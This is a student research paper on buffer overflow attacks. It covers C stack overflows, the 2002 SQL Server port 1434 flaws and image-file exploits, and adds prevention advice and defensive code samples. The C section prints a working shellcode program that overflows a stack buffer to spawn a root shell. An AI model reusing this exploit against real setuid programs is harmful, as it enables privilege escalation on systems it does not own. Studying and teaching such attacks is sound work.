Buffer Overflow: A Short Study

Jonathan Hutchison

Robert Lee

Connor Mahoney

Caleb Wherry

Information Security

Mrs. Nancy Smithfield

November 13, 2007

GroupA1

Buffer overflow is a serious problem in the computer world today. It poses a serious

threat to any piece of code out there and has the potential for great damage on any system, no

matter the operating system or manufacturer. Buffer overflow takes seemingly harmless code

and uses large amounts of information pushed into this code to make a machine do things it

normally would not do. By some estimates, this method of attack accounts for around 50% of all malicious attacks

that take place currently in the computer world. There is not one area of computers that is totally

immune to a buffer overflow attack. It appears in C/C++ programs, SQL database servers, Java, and even in

image processing. Malicious code can be hidden in images and when the image is opened, the

code is executed in the background. This can cause serious damage to someone’s computer in

many ways. Buffers can be attacked while the person at the computer is unaware of what

is going on, making it incredibly hard to stop one of these attacks. We will discuss some of

these dangers, how they can be

prevented, and what the future holds for each of them.

When looking at buffer overflows, one of the largest areas that pertains to them is

that of the programming languages C and C++. These languages’ unchecked use of arrays and vectors

makes it easy to cause a buffer overflow and do some serious damage. But before we get into the

technical specifics of a buffer overflow attack in C and C++, let’s first define what a buffer

overflow really is. A buffer overflow occurs when more data is written into a buffer than it

can hold, so the excess flows over into adjacent parts of memory. But what is

a buffer, you ask. A buffer is a region of memory set aside to hold data temporarily. It

stores input from the keyboard or information that is currently being processed by a running

program. This is where the first step of a buffer overflow attack starts, with the basic knowledge

of how computer buffers actually work. Since C and C++ are two of the most vulnerable

languages out there at the moment, we will look at ways to create a buffer overflow in these

languages. With these languages, there are many ways of going about causing damage with a

buffer, but we will look specifically at the case of stack-based buffer overflows. A stack is a

region of memory that holds each function call’s local variables and saved return address. It

works on a “First-In-Last-Out” basis: the most recently added item is the first to be removed.

We will look at this type, as opposed to heap-based buffer overflows, because it is much easier

to understand and code. Take this C code example:

#include <stdio.h>
#include <string.h>

// Shell code for 32-bit x86 Linux. Once the buffer is overflowed it runs
// "/bin/sh", starting a shell with the privileges of this process.
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char large_string[128];

int main(int argc, char *argv[])
{
    char buffer[96]; // buffer to overflow
    int i;
    long *long_ptr = (long *)large_string;

    // Fill large_string with the address of buffer, repeated 32 times.
    // This assumes 4-byte longs, as on 32-bit x86.
    for (i = 0; i < 32; i++)
        *(long_ptr + i) = (long)buffer;

    // Place the shell code at the start of large_string.
    for (i = 0; i < (int)strlen(shellcode); i++)
        large_string[i] = shellcode[i];

    // The string copy function in C should be used with the utmost caution.
    // It does no bounds checking, so the copy runs past the 96-byte buffer
    // and overwrites the saved return address with the address of buffer.
    strcpy(buffer, large_string);

    return 0; // returning jumps into the shell code instead of the caller
}

This code, when run on an unprotected 32-bit Linux system, starts a command shell without any

type of authentication at all! To understand why, you first have to understand that many library

functions in C and C++ are extremely risky to use, such as the “strcpy()” function. Neither this

function nor ordinary array indexing checks that an operation stays within the space that was

allocated for the destination. This is where knowledge of the stack can really help someone

cause a lot of damage. A string of at least 128 bytes is copied into the 96-byte buffer, so the

extra bytes spill past the end of the buffer and overwrite the saved return address with the

address of the buffer itself, which now holds the shell code. When main() returns, the processor

jumps to the shell code instead of back to its caller. The shell code then asks the operating

system to run “/bin/sh”, the standard command shell. The new shell inherits the privileges of the

program that was overflowed, so if that program runs as root (for example, a setuid-root

program), the attacker is handed full root privileges. The root user has full control of everything on the

Linux system. Once a person has access to the root account they can do anything they want on

the system. They have full rights to anything and everything. Just by executing this simple C

code they can gain full access to a Linux system within a few minutes. Preventing these kinds of

attacks is the next topic of interest for us in this study.
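
To make the overwrite described above easier to see without touching a real stack, here is a small sketch in C. It is only a toy model: the names toy_frame, toy_unchecked_copy, and toy_return_address_intact are our own inventions, the 16-byte buffer and 8-byte "return address" slot are assumed sizes, and real stack frames are laid out by the compiler. Both regions live inside one array, so writing past the buffer stays well defined.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Toy model of a stack frame (hypothetical layout): a 16-byte local buffer
   followed directly by an 8-byte slot standing in for the saved return
   address. Both live inside one array, so the demo never leaves its memory. */
enum { BUF_SIZE = 16, RET_SIZE = 8, FRAME_SIZE = BUF_SIZE + RET_SIZE };

typedef struct {
    unsigned char bytes[FRAME_SIZE];
} toy_frame;

/* Clear the buffer and fill the "return address" with a known pattern. */
void toy_frame_init(toy_frame *f)
{
    assert(f != NULL);
    memset(f->bytes, 0, BUF_SIZE);
    memset(f->bytes + BUF_SIZE, 0xAA, RET_SIZE);
}

/* Mimics strcpy(): copies up to the terminating NUL and ignores BUF_SIZE.
   The only limit is FRAME_SIZE, which keeps the demo inside the array. */
void toy_unchecked_copy(toy_frame *f, const char *input)
{
    size_t n;
    assert(f != NULL && input != NULL);
    n = strlen(input) + 1;
    if (n > FRAME_SIZE)
        n = FRAME_SIZE;
    memcpy(f->bytes, input, n);
}

/* Returns 1 if the simulated return address still holds its pattern. */
int toy_return_address_intact(const toy_frame *f)
{
    size_t i;
    assert(f != NULL);
    for (i = 0; i < RET_SIZE; i++)
        if (f->bytes[BUF_SIZE + i] != 0xAA)
            return 0;
    return 1;
}
```

Copying a short string such as "short" leaves the simulated return address untouched, while copying 24 or more characters replaces it with attacker-chosen bytes, which is the same effect the strcpy() call has in the example program.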

Preventing buffer overflow attacks is almost as easy as doing a buffer overflow attack.

First and foremost, use trusted libraries when running code. Do not use random libraries for your

code because you have no clue what is really going on when you make a function call out of that

library. Another thing that goes along with this is the use of good programming techniques as a

programmer. Do not write code that is going to be susceptible to overflow attacks. Make sure all

data coming from the user is in the right format and is within the limits expected by the program or

variable. Letting a user input as much information as they want is a sure way to open your

system up to buffer overflow attacks. Also test the software before it is released. Do not release

alpha versions of software without knowing good and well that the code is safe. As the above

example shows, a simple C program can cause much havoc on a Linux system. Test the

programs and make sure all data going in and out is being properly tested. A software developer

should also use readily available programs such as Flawfinder and Viega’s RATS to scan

their source code for possible weaknesses where an attack could happen. On the front end these

tasks may seem pointless and costly, but in the long run they help. One of the main causes for

software failure due to buffer overflow is the ineptitude of the programmers behind the software.

Time constraints and money bonuses get in the way of the real objective of a software product.

Steps are skipped in the writing of code, no one makes a note of it, and no one ever goes back

and fixes the issues, thus causing potential threats to people who use the software.

Best Practices for Prevention of Buffer Overflow In Code

Use trusted libraries when including them in projects.

Use buffer overflow prevention software to scan code to check for potential trouble spots.

Use trusted releases of programs. Alpha and beta versions are more likely to contain bugs that allow buffer overflows.

Check user input for validity and make sure it is in the correct format and within the size limits the function expects.

Use trusted functions within trusted libraries.

Know what you are using!
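
As one illustration of the "check user input" practice, the sketch below shows a length-checked replacement for a bare strcpy() call. The function name copy_checked and its return convention are our own assumptions, not part of any standard library; it is a minimal sketch rather than a complete input-validation scheme.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copies src into dst only if it fits, including the terminating NUL.
   Returns 0 on success and -1 if the input is too long. On failure dst is
   set to the empty string so the caller never sees partial data.
   (copy_checked is a hypothetical helper written for this example.) */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len;
    assert(dst != NULL && src != NULL && dst_size > 0);
    len = strlen(src);
    if (len >= dst_size) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}
```

With an 8-byte destination, copy_checked accepts "root" and rejects "12345678", because the eighth byte is needed for the terminator. The caller must check the return value and refuse the input rather than carry on with an empty string.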

The next big area of interest in buffer overflow is SQL (Structured Query

Language). SQL is used to build and query databases and is widely used with online

database systems as well. These two combined make a huge market for exploits in SQL to cause

buffer overflows. These attacks are done by inputting commands that exceed the space of the

variable assigned to take the input stream. The system can then be attacked by overwriting data

in order to execute malicious code or just cause corruption of data. For example, in 2002 an

advisory was issued by NGSSoftware Insight Security Research describing remote buffer

overrun vulnerabilities in Microsoft SQL Server 2000. Both stack-based and heap-based overflow

vulnerabilities existed, allowing a hacker to execute code of his or her choice without ever

needing to authenticate with the server. In each case, the security vulnerabilities in question

occurred through UDP port 1434, the Microsoft SQL monitor port. This port is routinely used by

legitimate clients in order to establish a connection to the server. UDP, or “User Datagram

Protocol”, is a connection-less communications protocol operating on the transport layer. Unlike

TCP, UDP does not need to establish a connection to function. This makes it faster than TCP, but

easier to spoof. This, combined with the stateless nature of UDP, also makes it easy to slip past

firewalls by looking like legitimate traffic. Ordinarily, traffic through this port will

contain a certain byte that lets the SQL monitor know that a client is trying to dynamically

discover how to connect to the server. However, other instructions can be sent through this port.

For instance, if a hacker wanted to exploit the stack-based overflow vulnerability, the first byte of

the packet can be set to 0x04, which tells the SQL Monitor to open a registry key using the

remaining data supplied in the packet. If this is followed by a large number of bytes, an overflow

occurs and the stack, including the saved return address, is overwritten. The hacker can include a

new return address and when the current process is finished the processor will go there instead

and begin executing the malicious code. A heap-based overflow attack can also be carried out

using a similar process. If the data appended to a packet is formatted a certain way, it can

overflow the heap-based buffer and exploit a vulnerability in SQL Server in which return values

are not validated before being passed to the next function. The result is a corrupted heap

structure which has the effect of a denial of service attack. When this vulnerability was

discovered in 2002, there wasn’t much that could be done to eliminate the risk until Microsoft

was able to create a patch. The risk could be reduced, however, by following best practices and

adding additional rules to the firewall to help filter out packets destined for port 1434 that, while

ordinarily may look legitimate, shouldn’t be destined for that port. An example would be a DNS

query response. Microsoft rated these particular threats as critical, and a patch was released in

July 2002.
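
The root cause in the stack-based case was a request handler that copied packet data into a fixed-size buffer without checking its length. The sketch below shows the kind of check that prevents this. It is not SQL Server’s actual code: the function name parse_open_key, the 32-byte limit KEY_NAME_MAX, and the packet layout beyond the leading 0x04 byte are assumptions made for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { KEY_NAME_MAX = 32 };   /* hypothetical buffer size for this sketch */
enum { OP_OPEN_KEY = 0x04 };  /* request type byte mentioned in the text */

/* Parses a datagram of the assumed form [opcode][name bytes...].
   Returns 0 and fills key_name (NUL-terminated) on success, or -1 for an
   empty, unknown, or oversized request. Nothing is copied on failure. */
int parse_open_key(const uint8_t *pkt, size_t pkt_len,
                   char key_name[KEY_NAME_MAX])
{
    size_t name_len;
    assert(pkt != NULL && key_name != NULL);
    if (pkt_len < 2 || pkt[0] != OP_OPEN_KEY)
        return -1;
    name_len = pkt_len - 1;
    if (name_len >= KEY_NAME_MAX)   /* leave room for the terminator */
        return -1;
    memcpy(key_name, pkt + 1, name_len);
    key_name[name_len] = '\0';
    return 0;
}
```

The important design choice is that the length is taken from the number of bytes actually received and compared against the destination size before any copying happens, so a 200-byte request is rejected instead of overwriting the stack.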

The last type of buffer overflow that we are going to look at is related to

steganography. Steganography is the act of hiding messages where they will not be

detected. The modern use of this concept has been hiding information in image or video files.

However, messages aren’t the only things that can be hidden in digital images. Buffer overflows

can occur in almost any unprotected area. While an attack usually carries its payload in a malicious

program, several image formats are vulnerable to this type of exploit as well. When a

computer attempts to display a crafted image, the hidden code is written into the machine’s

memory via a buffer overflow without the user knowing. Steganography can be used in both traditional

and digital images, although it is much harder to detect in digital pictures. One use of this has caused

controversy among privacy groups. Many color laser printer manufacturers have begun printing tiny

yellow dots onto printed pages. The pattern of dots is unique to each printer and is embedded into

every document printed. Their arrangement indicates the printer model, manufacturer,

and serial number. The government originally asked manufacturers to include these dots as a

way to track counterfeit bills, and many companies have complied.

A view of dots printed under a blue LED. (http://w2.eff.org/Privacy/printers/docucolor/)

This “traditional” form of steganography is considered easier, as it can be seen by anyone

looking in the correct place with a microscope. However, digital steganography is much harder

to detect. One reason for this is the amount of data contained in a digital photograph.

If a small message were embedded in a high-resolution photograph, it would be nearly

impossible to detect unless the exact location of the message was known in the data. For

instance, in a 24-bit image, each pixel totals 24 bits (8 bits each for red, green, and blue). That gives

256 shades of each color, for each pixel. If someone wanted to write a message using only the

last bit of every color value, they would need to modify at most 3 pixels for every 8-bit letter. One shade of

difference per color, per pixel, would be almost imperceptible to the human eye, even if one

were comparing it with the original side by side. Text isn’t the only data that can be hidden using

digital steganography. It is even possible to hide a lower resolution image inside of a higher-

resolution image, with almost no perceived difference in the original image. Using this

technique, it may even be possible to “hide” a video inside of another video, if one were to know

how to extract the data. Despite the possibilities with steganography, the real security issues are

related to buffer overflows in images. Many major systems and image formats have been exploited.

For Windows, there are exploits for formats such as JPEG, BMP, and GIF files. For Linux, there

was a hole found in software that handles the Portable Network Graphics format (PNG). However, the most recent

example has been a TIFF exploit in both the PlayStation Portable game system, and the Apple

iPhone.
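
The last-bit technique described earlier in this section can be sketched in a few lines of C. This is a minimal illustration, assuming the image is already available as a flat array of 8-bit color values; the function names lsb_embed and lsb_extract are our own, and real tools also deal with file formats, compression, and hiding the message length.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hides msg_len bytes in the lowest bit of successive color bytes.
   Each message byte needs 8 color bytes (just under 3 RGB pixels).
   Returns 0 on success, -1 if the image is too small. */
int lsb_embed(uint8_t *pixels, size_t pixel_bytes,
              const uint8_t *msg, size_t msg_len)
{
    size_t i;
    int bit;
    assert(pixels != NULL && msg != NULL);
    if (msg_len > pixel_bytes / 8)
        return -1;
    for (i = 0; i < msg_len; i++) {
        for (bit = 0; bit < 8; bit++) {
            /* take message bits from most significant to least */
            uint8_t b = (uint8_t)((msg[i] >> (7 - bit)) & 1u);
            size_t p = i * 8 + (size_t)bit;
            pixels[p] = (uint8_t)((pixels[p] & 0xFEu) | b);
        }
    }
    return 0;
}

/* Reads msg_len bytes back out of the lowest bits, in the same order. */
int lsb_extract(const uint8_t *pixels, size_t pixel_bytes,
                uint8_t *out, size_t msg_len)
{
    size_t i;
    int bit;
    assert(pixels != NULL && out != NULL);
    if (msg_len > pixel_bytes / 8)
        return -1;
    for (i = 0; i < msg_len; i++) {
        uint8_t value = 0;
        for (bit = 0; bit < 8; bit++)
            value = (uint8_t)((value << 1) |
                              (pixels[i * 8 + (size_t)bit] & 1u));
        out[i] = value;
    }
    return 0;
}
```

Because only the lowest bit changes, every color value moves by at most one shade, which is why the altered image looks the same as the original to the eye.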

The Apple iPhone is a closed system. While it has a fully functioning operating system,

it is limited to only Apple applications. However, a group of programmers found a way to get

around this. By visiting a website on the iPhone, http://www.jailbreakme.com/, the phone would

download a TIFF image file. The image had code embedded into it. This code crashed the

web browser and overwrote part of the file system. Once this occurred, the user was free to

install any compatible application they liked. Buffer overflows in images generally all work in the

same way. The program opening the image expects it to be a certain size, and allocates memory

for that size. However, it is possible to trick the program by way of an altered file header, or by

altering the structure of an image. When the image is loaded, its data unexpectedly overfills the

buffer, and the program keeps writing into the adjacent memory. If crafted correctly, the extra

data can overwrite a pointer or return address stored there, allowing a program to be

executed, or further code to be written.
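
An image loader can defend against an altered header by refusing to trust the sizes it declares. The sketch below shows one way to do that. The image_header structure, the function names, and the 1 MiB limit are hypothetical and do not correspond to any real image format or library.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { MAX_IMAGE_BYTES = 1 << 20 };   /* hypothetical 1 MiB cap */

/* Simplified header for this example only. */
typedef struct {
    uint32_t width;
    uint32_t height;
    uint32_t bytes_per_pixel;
} image_header;

/* Computes the pixel data size claimed by the header. Rejects zero
   dimensions, arithmetic overflow, and anything above MAX_IMAGE_BYTES.
   Returns 0 and stores the size in *out on success, -1 otherwise. */
int image_claimed_size(const image_header *h, size_t *out)
{
    uint64_t size;
    assert(h != NULL && out != NULL);
    if (h->width == 0 || h->height == 0 || h->bytes_per_pixel == 0)
        return -1;
    size = (uint64_t)h->width * h->height;   /* cannot overflow 64 bits */
    if (size > MAX_IMAGE_BYTES)
        return -1;
    size *= h->bytes_per_pixel;
    if (size > MAX_IMAGE_BYTES)
        return -1;
    *out = (size_t)size;
    return 0;
}

/* Copies pixel data into dst only when the header's claim matches the
   bytes actually present and fits in the destination buffer. */
int image_load_pixels(const image_header *h,
                      const uint8_t *data, size_t data_len,
                      uint8_t *dst, size_t dst_size)
{
    size_t claimed;
    assert(data != NULL && dst != NULL);
    if (image_claimed_size(h, &claimed) != 0)
        return -1;
    if (claimed != data_len || claimed > dst_size)
        return -1;
    memcpy(dst, data, claimed);
    return 0;
}
```

The loader compares three numbers before copying anything: the size the header claims, the number of bytes really in the file, and the size of the buffer it allocated. A file whose header disagrees with its contents is rejected instead of being allowed to run past the buffer.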

There are several ways to protect a computer from a buffer overflow attack in an image.

The most secure would be to disable loading of images in the web browser, and only open

pictures from trusted sources. This, however, is not practical. Another way is to periodically

check for updates and patches for these vulnerabilities, such as Microsoft’s patch for the GDI+

vulnerability that affected JPEG files in Windows operating systems. A third and easiest

approach is to simply be on the lookout. Don’t visit “shady” websites, or anywhere else that

may wish to infect your computer. In conclusion, images and videos can be used for many

purposes that were not originally intended. They can carry hidden messages without being

detected, or contain embedded code. This code can be used to simply crash a system, or

overwrite memory to execute malicious code. To prevent this, always use the latest patches and

security tips for your computers and digital devices.

Buffer overflow is a major problem in the world of computers as we know it. Someone

can easily take over a whole computer network by using buffer overflow to gain access to private

accounts, destroy valuable information by getting into an SQL database, or just mess around with

things by using this well-known type of exploit. With the speed of computers roughly doubling

every 18 months, buffer overflows are always going to be prevalent. Technology is

advancing so fast that the “minor” problems go overlooked. The business world of computers

today is more worried about how fast the machine will run and how much they can make off of

the system. A single unchecked array in one line out of 50 million lines of code doesn’t mean

anything to a lot of people anymore. Software deadlines and the promise of extra money drive

programmers to put out less than perfect software. As long as this is the case, buffer overflow

will always be a problem with code. A software developer who cuts corners because of deadlines

is almost certainly going to have trouble down the road with their code. A good hacker can find

vulnerabilities in any system, no matter how small it may seem. All they need is one small hole

and they are in. Buffer overflow attacks will become more and more troublesome as the

technological world leans more towards marketability instead of user satisfaction.

Works Cited

“Buffer Overruns in SQL Server 2000.” Microsoft Security. 24 July 2002.

<http://www.microsoft.com/technet/security>

Cobb, Michael. “How Buffer-overflow Vulnerabilities Occur.” Search Security. 12 December

2005. <http://searchsecurity.techtarget.com>

Fayolle, Pierre-Alain. “A Buffer Overflow Study: Attacks & Defense.” Network & Distributed

Systems. 2002.

Ghost_Rider. “Introduction to Buffer Overflow.” <http://www.governmentsecurity.org>

Grover, Sandeep. “Buffer Overflow Attacks & Their Countermeasures.” Linux Journal. 10

March 2003. <http://www.linuxjournal.com/article/6701>

Kharrazi, Mehdi. “Image Steganography: Concepts and Practice.” 22 April 2004.

Ogorkiewicz, Maciej. “Analysis of Buffer Overflow Attacks.” Windows Security. 23 July 2003.

<http://www.windowsecurity.com>

“Unauthenticated Remote Compromise in MS SQL Server 2000.” 25 July 2002.

<http://www.nextgenss.com/advisories/mssql-udp.txt>
